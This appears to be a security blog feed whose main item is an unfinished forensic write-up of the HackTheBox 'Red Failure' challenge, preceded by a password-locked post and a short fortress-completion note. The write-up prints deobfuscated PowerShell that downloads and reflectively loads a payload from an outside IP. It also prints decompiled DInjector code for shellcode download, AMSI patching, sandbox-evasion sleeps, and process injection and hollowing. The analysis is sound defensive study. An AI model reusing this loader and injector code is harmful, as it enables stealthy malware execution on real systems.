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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You can unlock this challenge by using the last password requested, or wait until the investigation is retired.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-03-11T22:37:00-05:002022-03-11T22:37:00-05:00Eric Turnertag:blog.ericturner.it,2022-03-11:/2022/03/11/hackthebox-context-fortress/

<p><img alt="No alternative text description for this image" src="https://media-exp1.licdn.com/dms/image/C4E22AQHW1sBRzR2wSg/feedshare-shrink_800/0/1647035358572?e=1649894400&amp;v=beta&amp;t=J7DsURsGl8Uzbh3-Yi5jGxbxrhObuIkf-2mrrrlZa1E"/></p> <p>Done!</p> <p>After several long days, I finally was able to pwn my first fortress on HackTheBox! Context by <a href="https://contextis.com/">Context Information Security</a>!</p> <p>This particular challenge had seven flags and had me exploit my way through a vulnerable web app, into a Windows Domained machine and compromise several web and domain users …</p>

<p><img alt="No alternative text description for this image" src="https://media-exp1.licdn.com/dms/image/C4E22AQHW1sBRzR2wSg/feedshare-shrink_800/0/1647035358572?e=1649894400&amp;v=beta&amp;t=J7DsURsGl8Uzbh3-Yi5jGxbxrhObuIkf-2mrrrlZa1E"/></p> <p>Done!</p> <p>After several long days, I finally was able to pwn my first fortress on HackTheBox! Context by <a href="https://contextis.com/">Context Information Security</a>!</p> <p>This particular challenge had seven flags and had me exploit my way through a vulnerable web app, into a Windows Domained machine and compromise several web and domain users in order to finally get Domain Admin and grab the final flag!</p> <p>Without spoiling exact methodology, it was definitely a difficult challenge that required me to do a lot of extra research to help bolster my skills and help me breakthrough when I got stuck. I look forward to another challenge after I take a few days break from this one!</p>2022-03-02T17:17:28-05:002022-03-02T17:17:28-05:00Eric Turnertag:blog.ericturner.it,2022-03-02:/2022/03/02/hackthebox-forensics-challenge-red-failure/

<p>Note: I am stumped on this particular challenge. Below is how far I've gotten.</p> <p>Link: <a href="https://app.hackthebox.com/challenges/red-failure">https://app.hackthebox.com/challenges/red-failure</a></p> <blockquote> <p>During a recent red team engagement one of our servers got compromised. Upon completion the red team should have deleted any malicious artifact or persistence mechanism used throughout the …</p></blockquote>

<p>Note: I am stumped on this particular challenge. Below is how far I've gotten.</p> <p>Link: <a href="https://app.hackthebox.com/challenges/red-failure">https://app.hackthebox.com/challenges/red-failure</a></p> <blockquote> <p>During a recent red team engagement one of our servers got compromised. Upon completion the red team should have deleted any malicious artifact or persistence mechanism used throughout the project. However, our engineers have found numerous of them left behind. It is therefore believed that there are more such mechanisms still active. Can you spot any, by investigating this network capture?</p> </blockquote> <h1 id="pcap-analysis">PCAP Analysis</h1> <p>We are provided a single capture.pcap with 171 packets inside of it.</p> <ul> <li>tcp.stream 1 is a <code>GET /4a7xH.ps1</code> file that contains some code for grabbing a powershell file</li> <li>tcp.stream 2 grabs a user32.dll file from the same place</li> <li>tcp.stream 3 calls the /9tVI0 endpoint which seems to contain some sort of zipped or encoded data that is used in the initial powershell script</li> </ul> <p>Deobfuscating the powershell code returns the following:</p> <div class="highlight"><pre><span></span><code><span class="c"># NOTE: Powershell variables are case insensitive and can disregard special characters like `</span> <span class="nb">Set-Variable</span> <span class="s1">'YuE51'</span> <span class="p">(</span><span class="no">[typE]</span><span class="p">(</span><span class="s1">'SySTeM.REFLEcTIOn.aSSemblY'</span><span class="p">));</span> <span class="p">${</span><span class="n">a</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'currentthread'</span> <span class="p">${</span><span class="n">B</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'147.182.172.189'</span> <span class="p">${</span><span class="n">C</span><span class="p">}</span> <span class="p">=</span> <span class="n">80</span> <span class="p">${</span><span class="n">D</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'user32.dll'</span> <span class="p">${</span><span class="n">E</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'9tVI0'</span> <span class="p">${</span><span class="n">f</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'z64&amp;Rx27Z$B%73up'</span> <span class="p">${</span><span class="n">g</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'C:\Windows\System32\svchost.exe'</span> <span class="p">${</span><span class="n">h</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'notepad'</span> <span class="p">${</span><span class="n">I</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'explorer'</span> <span class="p">${</span><span class="n">j</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'msvcp_win.dll'</span> <span class="p">${</span><span class="n">k</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'True'</span> <span class="p">${</span><span class="n">l</span><span class="p">}</span> <span class="p">=</span> <span class="s1">'True'</span> <span class="c"># ${methods} does not contain 'currentthread' so it appears these never actually do anything</span> <span class="p">${</span><span class="n">methods</span><span class="p">}</span> <span class="p">=</span> <span class="p">@((</span><span class="s1">'remotethread'</span><span class="p">),</span> <span class="p">(</span><span class="s1">'remotethreaddll'</span><span class="p">),</span> <span class="p">(</span><span class="s1">'remotethreadview'</span><span class="p">),</span> <span class="p">(</span><span class="s1">'remotethreadsuspended'</span><span class="p">)</span> <span class="k">if</span> <span class="p">(${</span><span class="n">methods</span><span class="p">}.(</span><span class="s1">'Contains'</span><span class="p">).</span><span class="n">Invoke</span><span class="p">(${</span><span class="n">A</span><span class="p">}))</span> <span class="p">{</span> <span class="p">${</span><span class="n">h</span><span class="p">}</span> <span class="p">=</span> <span class="p">(&amp;(</span><span class="s1">'Start-Process'</span><span class="p">)</span> <span class="n">-WindowStyle</span> <span class="p">(</span><span class="s1">'Hidden'</span><span class="p">)</span> <span class="n">-PassThru</span> <span class="p">${</span><span class="n">H</span><span class="p">}).</span><span class="s2">"I`d"</span> <span class="c"># starts a hidden 'notepad' process</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(${</span><span class="n">methods</span><span class="p">}.(</span><span class="s2">"Contains"</span><span class="p">).</span><span class="n">Invoke</span><span class="p">(${</span><span class="n">a</span><span class="p">}))</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="p">${</span><span class="n">I</span><span class="p">}</span> <span class="p">=</span> <span class="p">(&amp;(</span><span class="s2">"Get-Process"</span><span class="p">)</span> <span class="p">${</span><span class="n">I</span><span class="p">}</span> <span class="n">-ErrorAction</span> <span class="p">(</span><span class="s2">"Stop"</span><span class="p">)).</span><span class="s2">"ID"</span> <span class="c"># gets PID of explorer.exe</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">{</span> <span class="p">${</span><span class="n">I</span><span class="p">}</span> <span class="p">=</span> <span class="n">0</span> <span class="p">}</span> <span class="p">}</span> <span class="p">${</span><span class="n">cmd</span><span class="p">}</span> <span class="p">=</span> <span class="s2">"currentthread /sc:http://147.182.172.189:80/9tVI0 /password:'z64&amp;Rx27Z$B%73up' /image:C:\Windows\System32\svchost.exe /pid:${H} /ppid:${I} /dll:msvcp_win.dll /blockDlls:True /am51:True"</span> <span class="c"># contacts 9tVI0 endpoint of url and gets content to invoke</span> <span class="p">${</span><span class="n">data</span><span class="p">}</span> <span class="p">=</span> <span class="p">(.(</span><span class="s1">'IWR'</span><span class="p">)</span> <span class="n">-UseBasicParsing</span> <span class="s2">"http://147.182.172.189:80/9tVI0"</span><span class="p">).</span><span class="s2">"Content"</span> <span class="p">${</span><span class="n">assem</span><span class="p">}</span> <span class="p">=</span> <span class="p">(</span> <span class="nb">ls </span><span class="p">(</span><span class="s1">'vaRIaBLe:yUE51'</span><span class="p">)).</span><span class="s2">"Value"</span><span class="p">::(</span><span class="s1">'Load'</span><span class="p">).</span><span class="n">Invoke</span><span class="p">(${</span><span class="n">data</span><span class="p">})</span> <span class="p">${</span><span class="n">flags</span><span class="p">}</span> <span class="p">=</span> <span class="no">[Reflection.BindingFlags]</span> <span class="p">(</span><span class="s1">'NonPublic,Static'</span><span class="p">)</span> <span class="p">${</span><span class="n">class</span><span class="p">}</span> <span class="p">=</span> <span class="p">${</span><span class="n">assem</span><span class="p">}.(</span><span class="s1">'GetType'</span><span class="p">).</span><span class="n">Invoke</span><span class="p">((</span><span class="s1">'DInjector.Detonator'</span><span class="p">),</span> <span class="p">${</span><span class="n">flags</span><span class="p">})</span> <span class="p">${</span><span class="n">entry</span><span class="p">}</span> <span class="p">=</span> <span class="p">${</span><span class="n">class</span><span class="p">}.(</span><span class="s1">'GetMethod'</span><span class="p">).</span><span class="n">Invoke</span><span class="p">((</span><span class="s1">'Boom'</span><span class="p">),</span> <span class="p">${</span><span class="n">flags</span><span class="p">})</span> <span class="p">${</span><span class="n">entry</span><span class="p">}.</span><span class="s2">"Invoke"</span><span class="p">(${</span><span class="n">null</span><span class="p">},</span> <span class="p">(,</span> <span class="p">${</span><span class="n">cmd</span><span class="p">}.(</span><span class="s1">'Split'</span><span class="p">).</span><span class="n">Invoke</span><span class="p">(</span><span class="s2">" "</span><span class="p">)))</span> </code></pre></div> <p>In Wireshark, navigate to File &gt; Export Objects &gt; HTTP. Then I exported user32.dll and 9tVI0 for further analysis</p> <h1 id="user32dll-static-analysis">user32.dll Static Analysis</h1> <p>If we open the user32.dll in JetBrains dotPeek, we can see the private static void Boom function inside of Detonator.cs that shows how this data is used:</p> <div class="highlight"><pre><span></span><code><span class="k">private</span><span class="w"> </span><span class="k">static</span><span class="w"> </span><span class="k">void</span><span class="w"> </span><span class="nf">Boom</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span><span class="w"> </span><span class="n">args</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">Detonator</span><span class="p">.</span><span class="n">VirtualAllocExNuma</span><span class="p">(</span><span class="n">Process</span><span class="p">.</span><span class="n">GetCurrentProcess</span><span class="p">().</span><span class="n">Handle</span><span class="p">,</span><span class="w"> </span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">,</span><span class="w"> </span><span class="mi">4096U</span><span class="p">,</span><span class="w"> </span><span class="mi">12288U</span><span class="p">,</span><span class="w"> </span><span class="mi">4U</span><span class="p">,</span><span class="w"> </span><span class="mi">0U</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">IntPtr</span><span class="p">.</span><span class="n">Zero</span><span class="p">)</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">dwMilliseconds</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">Random</span><span class="p">().</span><span class="n">Next</span><span class="p">(</span><span class="mi">2000</span><span class="p">,</span><span class="w"> </span><span class="mi">3000</span><span class="p">);</span> <span class="w"> </span><span class="kt">double</span><span class="w"> </span><span class="n">num</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="w"> </span><span class="p">((</span><span class="kt">uint</span><span class="p">)</span><span class="w"> </span><span class="n">dwMilliseconds</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">1000U</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mf">0.5</span><span class="p">;</span> <span class="w"> </span><span class="n">DateTime</span><span class="w"> </span><span class="n">now</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">DateTime</span><span class="p">.</span><span class="n">Now</span><span class="p">;</span> <span class="w"> </span><span class="n">Detonator</span><span class="p">.</span><span class="n">Sleep</span><span class="p">((</span><span class="kt">uint</span><span class="p">)</span><span class="w"> </span><span class="n">dwMilliseconds</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">DateTime</span><span class="p">.</span><span class="n">Now</span><span class="p">.</span><span class="n">Subtract</span><span class="p">(</span><span class="n">now</span><span class="p">).</span><span class="n">TotalSeconds</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="n">num</span><span class="p">)</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="w"> </span><span class="n">Dictionary</span><span class="o">&lt;</span><span class="kt">string</span><span class="p">,</span><span class="w"> </span><span class="kt">string</span><span class="o">&gt;</span><span class="w"> </span><span class="n">dictionary</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ArgumentParser</span><span class="p">.</span><span class="n">Parse</span><span class="p">((</span><span class="n">IEnumerable</span><span class="o">&lt;</span><span class="kt">string</span><span class="o">&gt;</span><span class="p">)</span><span class="w"> </span><span class="n">args</span><span class="p">);</span> <span class="w"> </span><span class="k">try</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="kt">bool</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/am51"</span><span class="p">]))</span> <span class="w"> </span><span class="n">AM51</span><span class="p">.</span><span class="n">Patch</span><span class="p">();</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">ex</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="kt">string</span><span class="w"> </span><span class="n">s1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kt">string</span><span class="p">.</span><span class="n">Empty</span><span class="p">;</span> <span class="w"> </span><span class="k">foreach</span><span class="w"> </span><span class="p">(</span><span class="n">KeyValuePair</span><span class="o">&lt;</span><span class="kt">string</span><span class="p">,</span><span class="w"> </span><span class="kt">string</span><span class="o">&gt;</span><span class="w"> </span><span class="n">keyValuePair</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">dictionary</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">keyValuePair</span><span class="p">.</span><span class="n">Value</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="kt">string</span><span class="p">.</span><span class="n">Empty</span><span class="p">)</span> <span class="w"> </span><span class="n">s1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">keyValuePair</span><span class="p">.</span><span class="n">Key</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="kt">string</span><span class="w"> </span><span class="n">s2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/sc"</span><span class="p">];</span> <span class="w"> </span><span class="kt">string</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/password"</span><span class="p">];</span> <span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">data</span><span class="p">;</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">s2</span><span class="p">.</span><span class="n">IndexOf</span><span class="p">(</span><span class="s">"http"</span><span class="p">,</span><span class="w"> </span><span class="n">StringComparison</span><span class="p">.</span><span class="n">OrdinalIgnoreCase</span><span class="p">)</span><span class="w"> </span><span class="o">&gt;=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">"(Detonator) [*] Loading shellcode from URL"</span><span class="p">);</span> <span class="w"> </span><span class="n">WebClient</span><span class="w"> </span><span class="n">webClient</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">WebClient</span><span class="p">();</span> <span class="w"> </span><span class="n">ServicePointManager</span><span class="p">.</span><span class="n">SecurityProtocol</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SecurityProtocolType</span><span class="p">.</span><span class="n">Tls</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">SecurityProtocolType</span><span class="p">.</span><span class="n">Tls11</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">SecurityProtocolType</span><span class="p">.</span><span class="n">Tls12</span><span class="p">;</span> <span class="w"> </span><span class="kt">string</span><span class="w"> </span><span class="n">address</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">s2</span><span class="p">;</span> <span class="w"> </span><span class="n">MemoryStream</span><span class="w"> </span><span class="n">input</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">MemoryStream</span><span class="p">(</span><span class="n">webClient</span><span class="p">.</span><span class="n">DownloadData</span><span class="p">(</span><span class="n">address</span><span class="p">));</span> <span class="w"> </span><span class="n">data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">BinaryReader</span><span class="p">((</span><span class="n">Stream</span><span class="p">)</span><span class="w"> </span><span class="n">input</span><span class="p">).</span><span class="n">ReadBytes</span><span class="p">(</span><span class="n">Convert</span><span class="p">.</span><span class="n">ToInt32</span><span class="p">(</span><span class="n">input</span><span class="p">.</span><span class="n">Length</span><span class="p">));</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">else</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">"(Detonator) [*] Loading shellcode from base64 input"</span><span class="p">);</span> <span class="w"> </span><span class="n">data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">s2</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">numArray</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">AES</span><span class="p">(</span><span class="n">password</span><span class="p">).</span><span class="n">Decrypt</span><span class="p">(</span><span class="n">data</span><span class="p">);</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">ppid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="k">try</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">ppid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kt">int</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/ppid"</span><span class="p">]);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">ex</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="n">blockDlls</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">false</span><span class="p">;</span> <span class="w"> </span><span class="k">try</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="kt">bool</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/blockDlls"</span><span class="p">]))</span> <span class="w"> </span><span class="n">blockDlls</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">true</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">Exception</span><span class="w"> </span><span class="n">ex</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// ISSUE: reference to a compiler-generated method</span> <span class="w"> </span><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="n">u003CPrivateImplementationDetails</span><span class="err">\</span><span class="n">u003E</span><span class="p">.</span><span class="n">ComputeStringHash</span><span class="p">(</span><span class="n">s1</span><span class="p">))</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">597187931</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethread"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThread</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/pid"</span><span class="p">]));</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">886880049</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"processhollow"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">ProcessHollow</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/image"</span><span class="p">],</span><span class="w"> </span><span class="n">ppid</span><span class="p">,</span><span class="w"> </span><span class="n">blockDlls</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1013440982</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"functionpointerv2"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">FunctionPointerV2</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span 